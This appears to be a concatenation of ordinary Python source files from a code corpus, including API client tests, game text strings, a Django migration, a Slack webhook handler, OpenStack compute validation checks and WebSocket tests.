api_url = f"{self.api_url}/{str(domain_id)}"
# Setup the mocked response
responses.add(responses.DELETE, api_url, status=200)
domain = Domain(client=self.client)
response = domain.delete(domain_id)
self.assertEqual(True, response)
@responses.activate
def test_delete_failure_http_error(self):
"""
The function should raise an HTTPError exception if the deletion
failed.
"""
domain_id = 1234
api_url = f"{self.api_url}/{str(domain_id)}"
# Setup the mocked response
responses.add(responses.DELETE, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.delete, domain_id)
class TestActivate(TestDomain):
"""Test the .activate method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# missing domain_id
self.assertRaises(TypeError, domain.activate)
@responses.activate
def test_activate_success(self):
"""The function should return True if the activation succeeded."""
domain_id = 1234
api_url = f"{self.api_url}/{str(domain_id)}/activate"
# Setup the mocked response
responses.add(responses.PUT, api_url, status=200)
domain = Domain(client=self.client)
response = domain.activate(domain_id)
self.assertEqual(True, response)
@responses.activate
def test_activate_failure_http_error(self):
"""
The function should raise an HTTPError exception if the deletion
failed.
"""
domain_id = 1234
api_url = f"{self.api_url}/{str(domain_id)}/activate"
# Setup the mocked response
responses.add(responses.PUT, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.activate, domain_id)
class TestSuspend(TestDomain):
"""Test the .suspend method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# missing domain_id
self.assertRaises(TypeError, domain.suspend)
@responses.activate
def test_suspend_success(self):
"""The function should return True if the suspension succeeded."""
domain_id = 1234
api_url = f"{self.api_url}/{str(domain_id)}/suspend"
# Setup the mocked response
responses.add(responses.PUT, api_url, status=200)
domain = Domain(client=self.client)
response = domain.suspend(domain_id)
self.assertEqual(True, response)
@responses.activate
def test_suspend_failure_http_error(self):
"""
The function should raise an HTTPError exception if the suspension
failed.
"""
domain_id = 1234
api_url = f"{self.api_url}/{str(domain_id)}/suspend"
# Setup the mocked response
responses.add(responses.PUT, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.suspend, domain_id)
class TestDelegate(TestDomain):
"""Test the .delegate method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# missing domain_id
self.assertRaises(TypeError, domain.delegate)
@responses.activate
def test_delegate_success(self):
"""The function should return True if the delegation succeeded."""
domain_id = 1234
org_id = 4321
types = ["SSL"]
api_url = f"{self.api_url}/{str(domain_id)}/delegation"
# Setup the mocked response
responses.add(responses.POST, api_url, status=200)
domain = Domain(client=self.client)
response = domain.delegate(domain_id, org_id, types)
post_data = {
"orgId": org_id,
"certTypes": types
}
self.assertEqual(True, response)
self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8"))
@responses.activate
def test_delegate_failure_http_error(self):
"""The function should raise an HTTPError exception if the delegation failed."""
domain_id = 1234
org_id = 4321
types = ["SSL"]
api_url = f"{self.api_url}/{str(domain_id)}/delegation"
# Setup the mocked response
responses.add(responses.POST, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.delegate, domain_id, org_id, types)
class TestRemoveDelegation(TestDomain):
"""Test the .remove_delegation method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# missing domain_id
self.assertRaises(TypeError, domain.remove_delegation)
@responses.activate
def test_remove_delegation_success(self):
"""The function should return True if the delegation removal succeeded."""
domain_id = 1234
org_id = 4321
types = ["SSL"]
api_url = f"{self.api_url}/{str(domain_id)}/delegation"
# Setup the mocked response
responses.add(responses.DELETE, api_url, status=200)
domain = Domain(client=self.client)
response = domain.remove_delegation(domain_id, org_id, types)
post_data = {
"orgId": org_id,
"certTypes": types
}
self.assertEqual(True, response)
self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8"))
@responses.activate
def test_remove_delegation_failure_http_error(self):
"""The function should raise an HTTPError exception if the delegation removal failed."""
domain_id = 1234
org_id = 4321
types = ["SSL"]
api_url = f"{self.api_url}/{str(domain_id)}/delegation"
# Setup the mocked response
responses.add(responses.DELETE, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.remove_delegation, domain_id, org_id, types)
class TestApproveDelegation(TestDomain):
"""Test the .approve_delegation method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# missing domain_id
self.assertRaises(TypeError, domain.approve_delegation)
@responses.activate
def test_approve_delegation_success(self):
"""The function should return True if the approval succeeded."""
domain_id = 1234
org_id = 4321
api_url = f"{self.api_url}/{str(domain_id)}/delegation/approve"
# Setup the mocked response
responses.add(responses.POST, api_url, status=200)
domain = Domain(client=self.client)
response = domain.approve_delegation(domain_id, org_id)
post_data = {
"orgId": org_id,
}
self.assertEqual(True, response)
self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8"))
@responses.activate
def test_approval_failure_http_error(self):
"""The function should raise an HTTPError exception if the approval failed."""
domain_id = 1234
org_id = 4321
api_url = f"{self.api_url}/{str(domain_id)}/delegation/approve"
# Setup the mocked response
responses.add(responses.POST, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.approve_delegation, domain_id, org_id)
class TestRejectDelegation(TestDomain):
"""Test the .reject_delegation method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# missing domain_id
self.assertRaises(TypeError, domain.reject_delegation)
@responses.activate
def test_reject_delegation_success(self):
"""The function should return True if the rejection succeeded."""
domain_id = 1234
org_id = 4321
api_url = f"{self.api_url}/{str(domain_id)}/delegation/reject"
# Setup the mocked response
responses.add(responses.POST, api_url, status=200)
domain = Domain(client=self.client)
response = domain.reject_delegation(domain_id, org_id)
post_data = {
"orgId": org_id,
}
self.assertEqual(True, response)
self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8"))
@responses.activate
def test_reject_failure_http_error(self):
"""The function should raise an HTTPError exception if the rejection failed."""
domain_id = 1234
org_id = 4321
api_url = f"{self.api_url}/{str(domain_id)}/delegation/reject"
# Setup the mocked response
responses.add(responses.POST, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.reject_delegation, domain_id, org_id)
| 2.75 | 3 |
texts.py | ProtKsen/pgame | 2 | 4908 | <reponame>ProtKsen/pgame
"""Text parts."""
SEPARATOR = '----------------------------------'
CONT_GAME = 'enter для продолжения игры'
GREETING = 'Добро пожаловать в игру ''Сундук сокровищ''!\n' \
'Попробуй себя в роли капитана корабля, собери ' \
'команду и достань все сокровища!'
NAME_QUESTION = 'Как тебя зовут?'
CHOOSE_LEVEL = 'Выбери уровень сложности, он влияет на стоимость ' \
'сокровищ на островах. \n' \
'1 - легко \n' \
'2 - средне \n' \
'3 - тяжело'
INTRODUCTION = 'В наследство от дядюшки тебе достался корабль, \n' \
'несколько золотых монет и карта, на которой \n' \
'отмечены 10 островов. На каждом из островов \n' \
'зарыт клад. Но для того, чтобы достать его, \n' \
'необходимо обезвредить ловушку. Чем больше \n' \
'порядковый номер острова, тем ценнее хранящееся \n' \
'на нем сокровище и тем труднее его получить. \n\n' \
'Цель игры - добыть все сокровища и скопить как можно больше монет. \n\n' \
'Команда твоего корабля сможет обезвредить ловушку, \n' \
'только если будет иметь нужное количество очков \n' \
'логики, силы и ловкости. \n\n' \
'!!! Сумма всех требуемых очков равна номеру острова,\n' \
'но точная комбинация тебе неизвестна. !!!'
ORACLE_QUESTION = 'Здесь неподалеку живет известный оракул. За определенную\n' \
'плату он сможет предсказать с какой ловушкой\n' \
'ты столкнешься на острове. Пойдешь ли ты к нему?\n' \
'----------------------------------\n'\
'1 - да, пойду\n' \
'2 - нет, сам разберусь'
ORACLE_QUESTION_1 = 'Что ты хочешь узнать у оракула? \n' \
'----------------------------------\n'\
'1 - я передумал, буду сам себе оракул! \n'\
'2 - сколько очков логики должно быть у команды? (1 монета) \n'\
'3 - сколько очков силы должно быть у команды? (1 монета) \n'\
'4 - сколько очков ловкости должно быть у команды? (1 монета) \n'\
'5 - узнать все требуемые характеристики (3 монеты)'
ORACLE_QUESTION_2 = 'Что ты хочешь узнать у оракула? \n' \
'----------------------------------\n'\
'1 - я передумал, буду сам себе оракул! \n'\
'2 - сколько очков логики должно быть у команды? (1 монета) \n'\
'3 - сколько очков силы должно быть у команды? (1 монета) \n'\
'4 - сколько очков ловкости должно быть у команды? (1 монета)'
GO_TAVERN_TEXT = 'Отлично! Для похода на остров тебе понадобится \n' \
'команда, а нанять ее ты сможешь в таверне.'
EXIT_QUESTION = 'Продолжить игру?\n' \
'----------------------------------\n'\
'1 - да\n' \
'2 - нет'
SUCCESS_STEP = 'Поздравляю! Ты смог достать спрятанное сокровище! \n' \
'Самое время готовиться к следующему походу.'
FAILURE_STEP = 'К сожалению, ты не смог достать сокровище. \n' \
'Если у тебя еще остались монеты, то можешь \n' \
'попробовать организовать поход заново. Удачи!'
WINNING = 'Поздравляю! Ты собрал сокровища со всех окрестных \n' \
'островов, можешь выкинуть ненужную теперь карту) \n' \
'Конец игры.'
LOSING = 'Сожалею, ты потратил все деньги. Карьера пиратского \n' \
'капитана подошла к концу. А дядюшка в тебя верил! \n' \
'Конец игры.'
NAMES = ['Боб', 'Ричард', 'Алан', 'Степан', 'Грозный Глаз', 'Гарри',
'Моррис', 'Джек', 'Алекс', 'Сэм', 'Том', 'Янис', 'Геральт',
'Ринсвинд', 'Купер', 'Борис', 'Джон', 'Рон']
| 2.328125 | 2 |
api/migrations/0001_initial.py | alerin345/Instagram-React | 0 | 4909 | <gh_stars>0
# Generated by Django 3.1.3 on 2021-01-07 00:42
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Image',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('picture', models.ImageField(null=True, upload_to='')),
('description', models.TextField(blank=True, default='')),
('likes', models.IntegerField(default=0)),
('comments', models.IntegerField(default=0)),
('date', models.DateTimeField(default=django.utils.timezone.now)),
('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Subscription',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='user', to=settings.AUTH_USER_MODEL)),
('userSubscribed', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='userSubscribed', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Profile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('picture', models.ImageField(blank=True, default='default.png', null=True, upload_to='')),
('description', models.TextField(blank=True, default='')),
('user', models.OneToOneField(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Like',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('image', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='api.image')),
('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('value', models.TextField()),
('date', models.DateTimeField(default=django.utils.timezone.now)),
('image', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='api.image')),
('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.AddConstraint(
model_name='subscription',
constraint=models.UniqueConstraint(fields=('user', 'userSubscribed'), name='unique subscribes'),
),
migrations.AddConstraint(
model_name='like',
constraint=models.UniqueConstraint(fields=('image', 'user'), name='unique likes'),
),
]
| 1.734375 | 2 |
fastapi_router_controller/lib/controller_loader.py | KiraPC/fastapi-router-controller | 21 | 4910 | <reponame>KiraPC/fastapi-router-controller
import os
import importlib
class ControllerLoader:
"""
The ControllerLoader class.
"""
@staticmethod
def load(directory, package):
"""
It is an utility to load automatically all the python
module presents on a given directory
"""
for module in os.listdir(directory):
sub_dir = directory + "/" + module
if os.path.isdir(sub_dir):
ControllerLoader.load(sub_dir, "{}.{}".format(package, module))
if module == "__init__.py" or module[-3:] != ".py":
continue
else:
module_import_name = "{}.{}".format(package, module[:-3])
importlib.import_module(module_import_name)
| 3.0625 | 3 |
app/mod_ecomm/controllers.py | VikrantReddy/Instagram2Shop | 0 | 4911 | from flask import Blueprint, Flask, send_from_directory
from werkzeug.security import check_password_hash, generate_password_hash
from app import db
from app.mod_auth.forms import LoginForm
from app.mod_auth.models import User
mod_ecomm = Blueprint('products', __name__, url_prefix='/products',
static_folder='../../frontend/build')
@mod_ecomm.route("/", defaults={'path': ''})
def serve(path):
if path:
return send_from_directory(mod_ecomm.static_folder, path)
else:
return send_from_directory(mod_ecomm.static_folder, 'index.html')
| 1.609375 | 2 |
dagr_selenium/crawl_watchlist.py | phillmac/dagr_selenium | 0 | 4912 | from .functions import monitor_watchlist_action, manager
with manager.get_dagr():
monitor_watchlist_action()
| 1.25 | 1 |
zenslackchat/eventsview.py | uktrade/zenslackchat | 2 | 4913 | import pprint
import logging
from django.conf import settings
from rest_framework import status
from rest_framework.views import APIView
from rest_framework.response import Response
from zenslackchat.message import handler
from zenslackchat.models import SlackApp
from zenslackchat.models import ZendeskApp
class Events(APIView):
"""Handle Events using the webapp instead of using the RTM API.
This is handy as i don't need to run a specifc bot process just to handle
events. Instead I can just using the webapp REST API for this.
Handy documentation for Slack events: https://api.slack.com/events-api
The app needs to subscribe to events to receive them. From
https://api.slack.com/apps/<APP ID>/event-subscriptions you need to:
- Enable Events from "Off" to "On"
- Enter the "Request URL" e.g.: http://<instance id>.ngrok.io/slack/events/
- Then "Subscribe to events on behalf of users"
- Click "Add Workspace Event" and add "message.channels".
Message on channels will now start being recieved. The bot will need to be
invited to a channel first.
"""
def post(self, request, *args, **kwargs):
"""Events will come in over a POST request.
"""
log = logging.getLogger(__name__)
slack_message = request.data
if slack_message.get('token') != settings.SLACK_VERIFICATION_TOKEN:
log.error("Slack message verification failed!")
return Response(status=status.HTTP_403_FORBIDDEN)
# verification challenge, convert to signature verification instead:
if slack_message.get('type') == 'url_verification':
return Response(data=slack_message, status=status.HTTP_200_OK)
if 'event' in slack_message:
event = slack_message.get('event')
if settings.DEBUG:
log.debug(f'event received:\n{pprint.pformat(event)}\n')
try:
handler(
event,
our_channel=settings.SRE_SUPPORT_CHANNEL,
slack_client=SlackApp.client(),
zendesk_client=ZendeskApp.client(),
workspace_uri=settings.SLACK_WORKSPACE_URI,
zendesk_uri=settings.ZENDESK_TICKET_URI,
user_id=settings.ZENDESK_USER_ID,
group_id=settings.ZENDESK_GROUP_ID,
)
except: # noqa
# I want all event even if they cause me problems. If I don't
# accept the webhook will be marked as broken and then no more
# events will be sent.
log.exception("Slack message_handler error: ")
return Response(status=status.HTTP_200_OK)
| 2.140625 | 2 |
sdv/docker/sdvstate/internal/validator/airship/compute_check.py | opnfv/cirv-sdv | 2 | 4914 | <gh_stars>1-10
# Copyright 2020 University Of Delhi.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Compute Related Checks
"""
import configparser
import json
import re
import logging
from tools.kube_utils import kube_exec, get_pod_with_labels
from tools.conf import settings
from internal import store_result
###########
# Checks
###########
def isolated_cores_check():
"""
isolated_cores_check
"""
logger = logging.getLogger(__name__)
traced_value = trace_isolated_cores()
required_value = required_isolated_cores()
result = {'category': 'compute',
'case_name': 'isolated_cores_check',
'details': {'traced_cores': traced_value,
'required_cores': required_value
}
}
if is_ranges_equals(traced_value, required_value):
result['criteria'] = 'pass'
else:
result['criteria'] = 'fail'
store_result(logger, result)
return result
def reserved_vnf_cores_check():
"""
reserved_vnf_cores_check
"""
logger = logging.getLogger(__name__)
traced_value = trace_reserved_vnf_cores()
required_value = required_reserved_vnf_cores()
result = {'category': 'compute',
'case_name': 'reserved_vnf_cores_check',
'details': {'traced_cores': traced_value,
'required_cores': required_value
}
}
if is_ranges_equals(traced_value, required_value):
result['criteria'] = 'pass'
else:
result['criteria'] = 'fail'
store_result(logger, result)
return result
def vswitch_pmd_cores_check():
"""
vswitch_pmd_cores_check
"""
logger = logging.getLogger(__name__)
traced_value = trace_vswitch_pmd_cores()
required_value = required_vswitch_pmd_cores()
result = {'category': 'compute',
'case_name': 'vswitch_pmd_cores_check',
'details': {'traced_cores': traced_value,
'required_cores': required_value
}
}
if is_ranges_equals(traced_value, required_value):
result['criteria'] = 'pass'
else:
result['criteria'] = 'fail'
store_result(logger, result)
return result
def vswitch_dpdk_lcores_check():
"""
vswitch_dpdk_lcores_check
"""
logger = logging.getLogger(__name__)
traced_value = trace_vswitch_dpdk_lcores()
required_value = required_vswitch_dpdk_lcores()
result = {'category': 'compute',
'case_name': 'vswitch_dpdk_lcores_check',
'details': {'traced_cores': traced_value,
'required_cores': required_value
}
}
if is_ranges_equals(traced_value, required_value):
result['criteria'] = 'pass'
else:
result['criteria'] = 'fail'
store_result(logger, result)
return result
def os_reserved_cores_check():
"""
os_reserved_cores_check
"""
logger = logging.getLogger(__name__)
traced_value = trace_os_reserved_cores()
required_value = required_os_reserved_cores()
result = {'category': 'compute',
'case_name': 'os_reserved_cores_check',
'details': {'traced_cores': traced_value,
'required_cores': required_value
}
}
if is_ranges_equals(traced_value, required_value):
result['criteria'] = 'pass'
else:
result['criteria'] = 'fail'
store_result(logger, result)
return result
def nova_scheduler_filters_check():
"""
nova_scheduler_filters_check
"""
logger = logging.getLogger(__name__)
traced_value = trace_nova_scheduler_filters()
required_value = required_nova_scheduler_filters()
result = {'category': 'compute',
'case_name': 'nova_scheduler_filters_check',
'details': {'traced_filters': traced_value,
'required_filters': required_value
}
}
if are_lists_equal(traced_value, required_value):
result['criteria'] = 'pass'
else:
result['criteria'] = 'fail'
store_result(logger, result)
return result
def cpu_allocation_ratio_check():
"""
cpu_allocation_ratio_check
"""
logger = logging.getLogger(__name__)
traced_value = trace_cpu_allocation_ratio()
required_value = required_cpu_allocation_ratio()
result = {'category': 'compute',
'case_name': 'cpu_allocation_ratio_check',
'details': {'traced_ratio': traced_value,
'required_ratio': required_value
}
}
if traced_value == required_value:
result['criteria'] = 'pass'
else:
result['criteria'] = 'fail'
store_result(logger, result)
return result
###############
# helper functions
###############
def trace_isolated_cores():
"""
Trace isolated_cores from Airship deployment
:return: value traced from `isolcpus` key in `/proc/cmdline`
"""
pod = get_pod_with_labels('application=nova,component=compute')
cmd = ['cat', '/proc/cmdline']
proc_cmd = kube_exec(pod, cmd)
for option in proc_cmd.split():
if 'isolcpus' in option:
_, isolcpus_value = split_key_value(option)
break
return isolcpus_value
def required_isolated_cores():
"""
Returns value of `isolated_cpus` from platform_profile used by
Role for worker nodes in PDF
:return: isolated_cores value expected by the PDF
"""
worker_role = settings.getValue('WORKER_ROLE_NAME')
profile = get_platform_profile_by_role(worker_role)
return profile['isolated_cpus']
def trace_reserved_vnf_cores():
"""
Trace vnf_reserved_cores from Airship deployment
:return: value traced from `vcpu_pin_set` key in nova.conf
of actual deployment
"""
try:
config = get_nova_conf()
vcpu_pin_set = config.get('DEFAULT', 'vcpu_pin_set')
except (configparser.NoOptionError, configparser.MissingSectionHeaderError):
vcpu_pin_set = ''
return vcpu_pin_set
def required_reserved_vnf_cores():
"""
Returns value of vnf_cores from platform_profile used by
Role for worker nodes in PDF
:return: vnf_reserverd_core value expected by the PDF
"""
worker_role = settings.getValue('WORKER_ROLE_NAME')
profile = get_platform_profile_by_role(worker_role)
return profile['vnf_cores']
def trace_vswitch_pmd_cores():
"""
Trace vswitch_pmd_cores from Airship deployment
:return: value traced from `other_config:pmd-cpu-mask` in
openvswitchdb using ovs-vsctl
"""
ovs_pod = get_pod_with_labels('application=openvswitch,component=openvswitch-vswitchd')
cmd = ['ovs-vsctl', '-t', '5', 'get', 'Open_vSwitch', '.', 'other_config']
response = kube_exec(ovs_pod, cmd)
# convert config str to json str
match = re.findall("[a-zA-Z0-9-]+=", response)
for key in match:
response = response.replace(key, '"' + key[:-1] + '":')
match = re.findall(":[a-zA-Z0-9-]+", response)
for key in match:
response = response.replace(key[1:], '"' + key[1:] + '"')
config = json.loads(response)
if 'pmd-cpu-mask' in config:
pmd_cores = hex_to_comma_list(config['pmd-cpu-mask'])
else:
pmd_cores = ''
return pmd_cores
def required_vswitch_pmd_cores():
"""
Returns value of vswitch_pmd_cores from platform_profile used by
Role for worker nodes in PDF
:return: vswitch_pmd_cores value expected by the PDF
"""
worker_role = settings.getValue('WORKER_ROLE_NAME')
profile = get_platform_profile_by_role(worker_role)
return profile['vswitch_pmd_cores']
def trace_vswitch_dpdk_lcores():
"""
Trace vswitch_dpdk_lcores from Airship deployment
:return: value traced from `other_config:dpdk-lcore-mask` in
openvswitchdb using ovs-vsctl
"""
ovs_pod = get_pod_with_labels('application=openvswitch,component=openvswitch-vswitchd')
cmd = ['ovs-vsctl', '-t', '5', 'get', 'Open_vSwitch', '.', 'other_config']
response = kube_exec(ovs_pod, cmd)
# convert config str to json str
match = re.findall("[a-zA-Z0-9-]+=", response)
for key in match:
response = response.replace(key, '"' + key[:-1] + '":')
match = re.findall(":[a-zA-Z0-9-]+", response)
for key in match:
response = response.replace(key[1:], '"' + key[1:] + '"')
config = json.loads(response)
if 'dpdk-lcore-mask' in config:
pmd_cores = hex_to_comma_list(config['dpdk-lcore-mask'])
else:
pmd_cores = ''
return pmd_cores
def required_vswitch_dpdk_lcores():
"""
Returns value of vswitch_dpdk_lcores from platform_profile used by
Role for worker nodes in PDF
:return: vswitch_dpdk_lcores value expected by the PDF
"""
worker_role = settings.getValue('WORKER_ROLE_NAME')
profile = get_platform_profile_by_role(worker_role)
return profile['vswitch_dpdk_lcores']
def trace_os_reserved_cores():
"""
Trace os_reserved_cores from Airship deployment
os_reserved_cores = all_cores - (reserved_vnf_cores +
vswitch_pmd_cores +
vswitch_dpdk_lcores)
"""
worker_role = settings.getValue('WORKER_ROLE_NAME')
all_cores = get_cores_by_role(worker_role)
reserved_vnf_cores = trace_reserved_vnf_cores()
vswitch_pmd_cores = trace_vswitch_pmd_cores()
vswitch_dpdk_lcores = trace_vswitch_dpdk_lcores()
non_os_cores = []
non_os_cores.extend(convert_range_to_list(reserved_vnf_cores))
non_os_cores.extend(convert_range_to_list(vswitch_pmd_cores))
non_os_cores.extend(convert_range_to_list(vswitch_dpdk_lcores))
os_reserved_cores = set(all_cores).difference(set(non_os_cores))
# return as string with comma separated value
return ','.join(map(str, list(os_reserved_cores)))
def required_os_reserved_cores():
"""
Returns value of os_reserved_cores from platform_profile used by
Role for worker nodes in PDF
:return: os_reserved_cores value expected by the PDF
"""
worker_role = settings.getValue('WORKER_ROLE_NAME')
profile = get_platform_profile_by_role(worker_role)
return profile['os_reserved_cores']
def trace_nova_scheduler_filters():
"""
Trace scheduler_filters from Airship deployment
:return: value traced from `enabled_filters` key in nova.conf
of actual deployment
"""
try:
config = get_nova_conf()
filters = config.get('filter_scheduler', 'enabled_filters')
except (configparser.NoOptionError, configparser.MissingSectionHeaderError):
filters = ''
filters = filters.split(',')
map(str.strip, filters)
return filters
def required_nova_scheduler_filters():
"""
Required nova scheduler_filters by the PDF
"""
pdf = settings.getValue('pdf_file')
filters = pdf['vim_functional']['scheduler_filters']
filters = filters.split(',')
map(str.strip, filters)
return filters
def trace_cpu_allocation_ratio():
"""
Trace cpu_allocation_ratio from Airship deployment
:return: value traced from `cpu_allocation_ratio` key in nova.conf
of actual deployment
"""
try:
config = get_nova_conf()
cpu_allocation_ratio = config.get('DEFAULT', 'cpu_allocation_ratio')
except (configparser.NoOptionError, configparser.MissingSectionHeaderError):
cpu_allocation_ratio = ''
return float(cpu_allocation_ratio)
def required_cpu_allocation_ratio():
"""
Required cpu_allocation_ratio by the PDF
"""
pdf = settings.getValue('pdf_file')
cpu_allocation_ratio = pdf['vim_functional']['cpu_allocation_ratio']
return float(cpu_allocation_ratio)
def get_role(role_name):
"""
Searches and returns role with `role_name`
"""
roles = settings.getValue('pdf_file')['roles']
for role in roles:
if role['name'] == role_name:
role_details = role
return role_details
def get_platform_profile(profile_name):
"""
Searches and returns platform_profile with `profile_name`
"""
platform_profiles = settings.getValue('pdf_file')['platform_profiles']
for profile in platform_profiles:
if profile['profile_name'] == profile_name:
profile_details = profile
return profile_details
def get_processor_profile(profile_name):
"""
Searches and returns processor_profile with `profile_name`
"""
processor_profiles = settings.getValue('pdf_file')['processor_profiles']
for profile in processor_profiles:
if profile['profile_name'] == profile_name:
profile_details = profile
return profile_details
def get_platform_profile_by_role(role_name):
"""
Returns platform profile details of a role
"""
role = get_role(role_name)
profile = get_platform_profile(role['platform_profile'])
return profile
def get_hardware_profile_by_role(role_name):
"""
Returns hardware profile details of a role
"""
role = get_role(role_name)
hardware_profiles = settings.getValue('pdf_file')['hardware_profiles']
for profile in hardware_profiles:
if profile['profile_name'] == role['hardware_profile']:
profile_details = profile
return profile_details
def get_cores_by_role(role_name):
"""
Returns cpu cores list of server hardware used in the role
"""
hardware_profile = get_hardware_profile_by_role(role_name)
processor_profile = hardware_profile['profile_info']['processor_profile']
profile = get_processor_profile(processor_profile)
cpus = []
for numa in profile['profile_info']['numas']:
cpus.extend(convert_range_to_list(numa['cpu_set']))
return cpus
def get_nova_conf():
"""
Returns parsed nova.conf
"""
pod = get_pod_with_labels('application=nova,component=compute')
cmd = ['cat', '/etc/nova/nova.conf']
response = kube_exec(pod, cmd)
config = configparser.ConfigParser()
config.read_string(response)
return config
### cpu cores related helper function
def convert_range_to_list(x):
"""
Returns list of numbers from given range as string
e.g.: convert_range_to_list('3-5') will give [3, 4, 5]
"""
# pylint: disable=C0103
result = []
for part in x.split(','):
if '-' in part:
a, b = part.split('-')
a, b = int(a), int(b)
result.extend(range(a, b + 1))
elif part != '':
a = int(part)
result.append(a)
# remove duplicates
result = list(dict.fromkeys(result))
return result
def is_ranges_equals(range1, range2):
"""
Checks whether two ranges passed as string are equal
e.g.: is_ranges_equals('2-5', '2-4,5') returns true
"""
set1 = set(convert_range_to_list(range1))
set2 = set(convert_range_to_list(range2))
return set1 == set2
def are_lists_equal(list1, list2):
"""
Checks whether two list are identicals
"""
set1 = set(list1)
set2 = set(list2)
return set1 == set2
def hex_to_comma_list(hex_mask):
"""
Converts CPU mask given in hex to list of cores
"""
binary = bin(int(hex_mask, 16))[2:]
reversed_binary = binary[::-1]
i = 0
output = ""
for bit in reversed_binary:
if bit == '1':
output = output + str(i) + ','
i = i + 1
return output[:-1]
def comma_list_to_hex(cpus):
"""
Converts a list of cpu cores in corresponding hex value
of cpu-mask
"""
cpu_arr = cpus.split(",")
binary_mask = 0
for cpu in cpu_arr:
binary_mask = binary_mask | (1 << int(cpu))
return format(binary_mask, '02x')
def split_key_value(key_value_str, delimiter='='):
"""
splits given string into key and value based on delimiter
:param key_value_str: example string `someKey=somevalue`
:param delimiter: default delimiter is `=`
:return: [ key, value]
"""
key, value = key_value_str.split(delimiter)
key = key.strip()
value = value.strip()
return key, value
| 2.09375 | 2 |
production/pygsl-0.9.5/testing/__init__.py | juhnowski/FishingRod | 1 | 4915 | """
Here you find either new implemented modules or alternate implementations
of already modules. This directory is intended to have a second implementation
beside the main implementation to have a discussion which implementation to
favor on the long run.
"""
| 1.40625 | 1 |
PythonServer/UnitTestCasesForWebSocket.py | Cyberlightning/2D-3DCapture | 2 | 4916 | '''
Created on Mar 6, 2014
@author: tharanga
'''
import unittest
from time import sleep
import EventService as es
from EventService import WebSocketServer as ws
from EventService import EventManager as em
import socket
from base64 import b64encode
import struct
import MySQLdb
import json
import EventService
import flaskr
import tempfile
def encodeMessage( message):
message = b64encode(message)
b1 =0x80 | 0x1 & 0x0f
b2 = 0
header=""
payload_len = len(message)
if payload_len < 126 :
header = struct.pack('>BB', b1, payload_len)
message= header +message
elif (payload_len < ((2 ** 16) - 1)):
b2 |= 126
header += chr(b1)
header += chr(b2)
l = struct.pack(">H", payload_len)
header += l
message = header +message
else:
b2 |= 127
header += chr(b1)
header += chr(b2)
l = struct.pack(">Q", payload_len)
header += l
message = header +message
return message
class TestWebSockets(unittest.TestCase):
def setUp(self):
self.wsServer = ws('',12345,'127.0.0.1')
self.wsServer.setRunning(True);
sleep(1)
self.testsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.testsocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # Create a socket object
host = 'localhost' # Get local machine name
port = 12345
self.testsocket.connect((host, port))
def tearDown(self):
self.wsServer.closeConnection();
self.testsocket.close()
sleep(1)
def test_webSocketServerOBject(self):
self.assertEqual(self.wsServer.SERVER, '', "Server set to the desired value")
self.assertEqual(self.wsServer.PORT, 12345, "Server port is set correctly")
self.assertEqual(self.wsServer.LOCALHOST, "127.0.0.1", "Localhost set to 127.0.0.1")
def test_invalid_Request(self):
message= "Test Message"
